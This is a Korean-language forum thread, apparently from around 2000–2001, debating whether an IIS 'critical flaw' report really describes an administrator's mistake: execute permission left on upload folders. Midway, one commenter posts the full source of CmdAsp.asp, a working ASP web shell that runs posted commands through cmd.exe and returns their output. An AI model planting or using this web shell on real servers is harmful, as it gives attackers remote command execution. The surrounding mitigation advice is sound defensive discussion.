MS 서버SW 중대결함 발견

geekforum의 이미지

원격조정으로 시스템 전체를 파괴할 수도

마이크로소프트(MS)사가 개발한 인터넷서버용 운용소프트웨어인 IIS(Internet Information Service)에 해커가 시스템 전체를 파괴할 수도 있는 중대한 결함이 발견됐다.

익명 사용자의 이미지

쥐뿔도 모르는
벤처업체 기획자나, 어설픈 기자님들이
자꾸 이런 기사 내보내는데,...

이런건 IIS의 bug가 아닙니다.
개발자나 관리자가 당연히 처리해 주어야
할 것을 안해준거지요.
도대체 메뉴얼도 안보고
ASP 강좌 한두개 읽어보고 coding하니까
이런 문제가 생기는 겁니다.

그리고,
저 기사 나면서,
script 몇줄 나왔던데...
그리 대단한 code도 아니더만요...

windows scripting인데,
MS에서 당연히 쓰라고 만들어 놓은 겁니다.
Shell script 비슷한 용도로 쓰라고요.
batch file로는 한계가 있던 것을
vbs로 확장시키면서 만든거죠.
당연히 쓰는 사람이 잘 알아서 해야
하는 건 당연한 거 아닌가요?

linux/아파치에서
root를 web home으로 해 놓는 사람을 없을 겁니다.
마찬가지인거 같은데....

...

저요?
저도 리눅서입니다.
한때 MS환경에서 좀 개발했었습니다.
너무 MS 욕하지 맙시다.

익명 사용자의 이미지

뭐 꼭 관리자의 실수라고는 할 수 없겠죠.

업로드가 필요한 곳도 있지 않습니까?

업로드를 막아놓은 만큼 웹서버의 효용성은 떨어지지 않을 까요?

정보를 공유할 수 없는데.

자세히 읽어보면 다운로드 할때 마다 원격 조정창이 뜬다는 부분이 더 중요한 것 같은데요.

그런 프로그램이 존재할 수 있다니. IIS 의 문제일 수 도 있겠군요.

아른 웹서버도 똑같은 문제가 있다면 왜 그러한 프로그램이 다른 웹서버용으로는 만들어 지지 않습니까?

가장 많이 쓰는 아파치 같은거 말이에요.

익명 사용자의 이미지

업로드를 막아야 하는 것이아니라, 업로드 폴더에 실행 권한 없애는 것이고요,
다운로드할 때마다 원격 조정창이 뜨는 것이 아니라 텍스트 박스에 dir/w 같은 dos용 명령어가 그대로 실행된다는 것입니다. 물론 이렇게 되면 안되겠죠. 하지만 php 에도 실행권한 주면 ls, rm 같은 명령 실행시킬 수 있도록 똑같이 짤 수 있을 겁니다. 아래에 프로그램 있습니다만, asp 만 실행된다면야 아래처럼 안하고 다른 방식으로도 복사/편집/삭제 등 모두 할 수 있습니다.

"MS 서버SW 중대결함 발견"
이렇게 되어 있는데, 이 제목은 잘못된 것입니다. 문제가 마치 IIS 서버 자체에 있는 양 되어 있네요. MS 가 좋으냐, 싫으냐를 떠나서 중요한 것은 사실이 어떠냐 입니다. 서버SW에 결함이 있었던 것은 아니죠. 그리고 SecureNews 보고서에도, 애매하게 써있긴 하지만 IIS 자체의 결함이라고는 되어 있지 않습니다.

DiNe의 이미지

쩝. 얼마전에 PHP에서도 같은 소동이 있었지요. php 확장자에 관한겁니다.만약 PHP에서도 업로드한 파일을 저장하는 디렉토리에 CGI실행권한을 준다면 보기좋은 일(!)이 일어날겁니다.

요는, 업로드를 할 수 없게 한다가 아니라, 업로드한 내용이 실행되어서는 안된다! 라는거죠. IIS 5.0 을 기준으로 디렉토리에 대한 '실행 권한'을 '없음'으로 해주던지(기본이 '스크립트'로 되어있으며, 가장 위험도가 높은 항목으로는 '실행(스크립트 포함)'이 있음), 아니면 uploaded_file.exe 를 uploaded_file.exe.save 라고 고쳐서 저장한다면 해결되는 문제이지요. 요는, ASP 게시판 제작자들의 보안의식 부족입니다. 물론 ASP 개발자들의 사정도 만만찮게 열악하니 그런 문제 하나하나에 신경쓸 수 있을리가 없겠지요. 우선 나오고 볼 일일테니.

익명 사용자의 이미지

맞는 말씀입니다. 업로드 폴더에 실행권한 끄는 것은
기초적인 것입니다. 관리자의 실수를 가지고 IIS의
중대한 결함이라니..
이런 종류의 문제는 ASP뿐만 아니라 아마 PHP에서도
똑같이 가지고 있을 것입니다.
이 문제말고도 .bak파일은 꼭 지워준다거나 기타등등
대수롭지 않은 일인데도 관리자가 신경쓰지 않으면
쉽게 보안뚫리는 경우는 많습니다.
IIS와 ASP가 최고가 아니라는건 인정하지만 왜 사람들은
이렇게까지 비방하고 다니는건지.. 성능좋고 쓰기편한
서버임엔 분명하지 않습니까?
MS가 그리도 싫은건지..

익명 사용자의 이미지

IIS와 ASP가 최고가 아니라는건 인정하지만 왜 사람들은
이렇게까지 비방하고 다니는건지.. 성능좋고 쓰기편한...
^^^^^^^^
정말이요? -_-;

익명 사용자의 이미지

MS에 당하지 않았으니까 싫은지 않싫은지 모르지용...

MS때문에 직장 그만둔 사람이...

익명 사용자의 이미지


음... 한번 해보고 싶은데
해볼만한 곳이 없군요. -_-;;;

<++ CmdAsp.asp ++> <%@ Language=VBScript %> <% ' --------------------o0o-------------------- ' File: CmdAsp.asp ' Author: Maceo ' Release: 2000-12-01 ' OS: Windows 2000, 4.0 NT ' -------------------------------------------

Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then

' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

End If

%>


" method="POST">
">



<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>


<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>


<-- CmdAsp.asp -->

익명 사용자의 이미지

음 사악한 천재같으니 ㅡ,.ㅡ
나 언넝 소스 카피해야쥐 캬캬캬 ㅡ,.ㅡ;;
허미~~

익명 사용자의 이미지

어제 오늘 얘긴가....

익명 사용자의 이미지

글을 끝까지 읽어보면 이건 결함을 위장한 관리자의 부주의로 일어나게 된다라고 나옵니다. 업로드한 ASP파일이 실행된다는 것은 업로드 디렉토리에 있는 권한 문제이지 결함이라고 보기에는 맞지 않습니다. 윈도는 편한 사용법 때문인지 보안에 대한 준비를 소홀히 하므로써 해킹이 많이 일어난다고 생각합니다. 결국 컴포넌트로 만들어야 될지도...

익명 사용자의 이미지

어디서본 기사죠? ^^;
보신 기사 URL좀....

한정훈의 이미지

관련링크를 눌러보세요.

'98th student of KW-Univ., Dept of CE.